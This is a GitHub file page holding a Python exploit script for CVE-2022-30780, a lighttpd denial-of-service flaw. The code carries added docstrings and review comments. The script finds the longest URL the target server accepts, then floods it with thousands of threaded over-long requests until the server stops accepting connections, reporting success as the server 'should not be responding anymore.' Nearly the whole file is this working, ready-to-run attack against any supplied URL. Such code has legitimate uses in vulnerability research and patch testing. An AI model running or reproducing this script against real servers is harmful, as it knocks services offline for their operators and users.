-
-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathCVE-2022-30780-lighttpd-denial-of-service.py
executable file
·180 lines (156 loc) · 6.92 KB
/
CVE-2022-30780-lighttpd-denial-of-service.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name : CVE-2022-30780-lighttpd-denial-of-service.py
# Author : Podalirius (@podalirius_)
# Date created : 17 July 2021
import argparse
import requests
import time
from concurrent.futures import ThreadPoolExecutor
from enum import Enum
class RequestStatus(Enum):
    """Outcome of a single HTTP probe.

    Members mirror either an HTTP status code or a client-side
    ``requests`` exception, so both kinds of outcome can be compared
    uniformly as enum values.
    """
    OK = 0
    HTTP_200 = 200
    HTTP_403 = 403
    HTTP_404 = 404
    HTTP_500 = 500
    # Pseudo-codes (>1000) for client-side exceptions raised by requests,
    # distinct from any real HTTP status code.
    ReadTimeout = 1001
    ConnectTimeout = 1002
    ConnectionError = 1003
def test(baseurl, lenght, timeout=1):
    """Send one GET request whose full URL is padded to `lenght` characters.

    NOTE(review): the parameter name `lenght` is a typo for `length`; it is
    kept unchanged here to preserve the call interface for existing callers.

    :param baseurl: base URL of the target (scheme + host, no trailing slash)
    :param lenght:  total desired URL length, in characters
    :param timeout: requests timeout in seconds (default 1)
    :return: a RequestStatus — OK if any response came back, otherwise the
             member matching the requests exception that was raised.
    """
    try:
        # '/'+dots+'/' adds 2 chars, so pad with '.' until len(testurl) == lenght.
        length = lenght - (len(baseurl) + 2)
        testurl = baseurl + '/' + "."*length + "/"
        r = requests.get(testurl, timeout=timeout)
    except requests.exceptions.ReadTimeout as e:
        return RequestStatus.ReadTimeout
    except requests.exceptions.ConnectTimeout as e:
        return RequestStatus.ConnectTimeout
    except requests.exceptions.ConnectionError as e:
        return RequestStatus.ConnectionError
    # Any HTTP response at all (whatever the status code) counts as OK;
    # the response object itself is intentionally unused.
    return RequestStatus.OK
def dichotomic_search(url, timeout=1, verbose=False):
    """Binary-search the maximum URL length the server accepts before timing out.

    Starts at length 1000 with a step of 1000; grows while probes still
    succeed, then halves the step and bisects around the failure boundary.
    The search aborts if the candidate length leaves the (0, 150000] window.

    :param url:     base URL of the target
    :param timeout: per-probe timeout in seconds, forwarded to test()
    :param verbose: print each probe's length and status when True
    :return: the discovered maximum URL length as an int, or None when the
             boundary could not be determined.
    """
    print("[>] Performing dichotomic search to find maximum URL length ...")
    urllen, step = 1000, 1000
    # Baseline probe at the URL's own length; used as the "server reachable"
    # reference status for the rest of the search.
    normal_response = test(url, len(url), timeout=timeout)
    last_result = normal_response
    # NOTE(review): last_result was just assigned normal_response, so this
    # condition is always true and the trailing else branch is unreachable.
    if last_result == normal_response:
        while step >= 1 and 0 < urllen <= 150000:
            result = test(url, urllen, timeout=timeout)
            if verbose:
                print(" [>] Testing URL length %d, (%s => %s)" % (urllen, result.name, last_result.name))
            if last_result == RequestStatus.OK:
                if result == RequestStatus.OK:
                    # Still succeeding: keep growing by the current step.
                    urllen = urllen + step
                else:
                    # Too long
                    step = step//2
                    urllen = urllen - step
            else:
                if result == normal_response:
                    # Back under the limit: halve the step and grow again.
                    step = step//2
                    urllen = urllen + step
                else:
                    # Too long
                    urllen = urllen - step
            last_result = result
        if urllen <= 0 or urllen >= 150000:
            print("[!] Could not determine maximum URL length.")
            print("[!] Maybe we can't connect to this URL or this lighttpd is not vulnerable?")
            return None
        else:
            print("[+] Found maximum URL length %d" % urllen)
            return urllen
    else:
        # Unreachable in practice (see NOTE above); kept as-is.
        print("[!] Could connect to this URL. (%s)" % last_result)
        return None
def worker(baseurl, max_url_len, monitor_data):
    """Thread-pool task: send a single over-long request (max_url_len + 1).

    Updates the shared `monitor_data` dict counters read by monitor_thread.
    NOTE(review): the `x = x + 1` counter updates are not atomic; under many
    threads the counts may slightly under-report. They are display-only.

    :param baseurl:      base URL of the target
    :param max_url_len:  maximum accepted URL length found by dichotomic_search
    :param monitor_data: shared dict with "sent"/"ReadTimeout"/"ConnectTimeout" counters
    :return: the name of the timeout exception that occurred, or None.
    """
    try:
        # One past the accepted maximum, padded the same way as test().
        length = (max_url_len + 1) - (len(baseurl) + 2)
        testurl = baseurl + '/' + "."*length + "/"
        monitor_data["sent"] = monitor_data["sent"] + 1
        r = requests.get(testurl, timeout=1)
    except requests.exceptions.ReadTimeout as e:
        monitor_data["ReadTimeout"] = monitor_data["ReadTimeout"] + 1
        return "ReadTimeout"
    except requests.exceptions.ConnectTimeout as e:
        monitor_data["ConnectTimeout"] = monitor_data["ConnectTimeout"] + 1
        return "ConnectTimeout"
    return None
def monitor_thread(monitor_data):
    """Progress reporter: print counters every 0.5 s until done or DoS detected.

    A "DoS" is inferred when, for more than 3 consecutive samples, new
    ConnectTimeouts appear while ReadTimeouts stay flat (the server stopped
    accepting connections). When that happens, pending futures are cancelled.

    :param monitor_data: shared dict with "sent", "total", "ReadTimeout",
                         "ConnectTimeout" counters and a "tasks" list of Futures.
    """
    refresh_rate = 0.5
    dos_count = 0
    mon_last, mon_now = monitor_data.copy(), monitor_data.copy()
    while monitor_data["sent"] < monitor_data["total"] and dos_count <= 3:
        mon_now = monitor_data.copy()
        diff_ct = (mon_now["ConnectTimeout"] - mon_last["ConnectTimeout"])
        diff_rt = (mon_now["ReadTimeout"] - mon_last["ReadTimeout"])
        if (diff_ct > 0) and (diff_rt == 0):
            # sockets disabled, connection limit reached
            dos_count += 1
            # NOTE(review): the "Rate" field multiplies the per-interval delta
            # by refresh_rate (0.5) instead of dividing by it, so the printed
            # req/s is a quarter of the true rate. Display-only; left as-is.
            print("[monitoring] (%04d/%04d) %5.2f %% | Rate %3d req/s | ConnectTimeout:%04d | ReadTimeout:%04d (sockets disabled, connection limit reached) " % (
                mon_now["sent"],
                mon_now["total"],
                (mon_now["sent"] / mon_now["total"]) * 100,
                (mon_now["sent"] - mon_last["sent"]) * refresh_rate,
                mon_now["ConnectTimeout"],
                mon_now["ReadTimeout"])
            )
        else:
            # Any other pattern resets the consecutive-detection counter.
            dos_count = 0
            print("[monitoring] (%04d/%04d) %5.2f %% | Rate %3d req/s | ConnectTimeout:%04d | ReadTimeout:%04d " % (
                mon_now["sent"],
                mon_now["total"],
                (mon_now["sent"] / mon_now["total"]) * 100,
                (mon_now["sent"] - mon_last["sent"]) * refresh_rate,
                mon_now["ConnectTimeout"],
                mon_now["ReadTimeout"])
            )
        mon_last = mon_now
        time.sleep(refresh_rate)
    print()
    # If DoS, terminate all threads.
    # NOTE(review): Future.cancel() only prevents not-yet-started tasks from
    # running; tasks already executing are unaffected.
    if dos_count > 3:
        for t in monitor_data["tasks"]:
            t.cancel()
def parseArgs():
    """Parse command-line options.

    Returns:
        argparse.Namespace with fields:
            verbose (bool)      -- verbose output, default False
            url (str)           -- target URL, required
            insecure_tls (bool) -- allow weak/invalid TLS, default False
            threads (int)       -- worker thread count, default 256
    """
    parser = argparse.ArgumentParser(description="CVE-2022-30780-lighttpd-denial-of-service")
    parser.add_argument("-v", "--verbose", dest="verbose", action="store_true", default=False, help="Verbose mode")
    parser.add_argument("-u", "--url", dest="url", action="store", type=str, required=True, help="URL to connect to.")
    parser.add_argument("-k", "--insecure", dest="insecure_tls", action="store_true", default=False, help="Allow insecure server connections when using SSL (default: False)")
    # Fix: help text previously claimed "default: 20" while the actual default is 256.
    parser.add_argument("-t", "--threads", dest="threads", action="store", type=int, default=256, required=False, help="Number of threads (default: 256)")
    return parser.parse_args()
if __name__ == '__main__':
    options = parseArgs()
    # https://redmine.lighttpd.net/issues/3059
    # Hard-coded assumptions about lighttpd's default fd/connection limits.
    server_max_fds = 8192
    server_max_connections = 8192
    # Normalize the target URL: default to https:// and strip trailing slashes.
    if not options.url.startswith("http://") and not options.url.startswith("https://"):
        options.url = "https://" + options.url
    options.url = options.url.rstrip('/')
    if options.insecure_tls:
        # Disable warnings about insecure connections / invalid certificates.
        requests.packages.urllib3.disable_warnings()
        # Allow use of deprecated and weak cipher methods
        requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
        try:
            # Only present when pyOpenSSL is installed; ignore otherwise.
            requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
        except AttributeError:
            pass
    # Detecting maximum URL length
    max_url_len = dichotomic_search(options.url, timeout=1, verbose=options.verbose)
    if max_url_len is not None:
        # Shared (unlocked) state between workers and the monitor thread.
        monitor_data = {
            "total": server_max_connections,
            "sent": 0,
            "ReadTimeout": 0,
            "ConnectTimeout": 0,
            "tasks": []
        }
        # Waits for all the threads to be completed
        with ThreadPoolExecutor(max_workers=min(options.threads, server_max_connections)) as tp:
            # The monitor occupies one pool slot; workers fill the rest.
            tp.submit(monitor_thread, monitor_data)
            for k in range(server_max_connections):
                t = tp.submit(worker, options.url, max_url_len, monitor_data)
                monitor_data["tasks"].append(t)
        print("[>] All done! Remote server at %s should not be responding anymore." % options.url)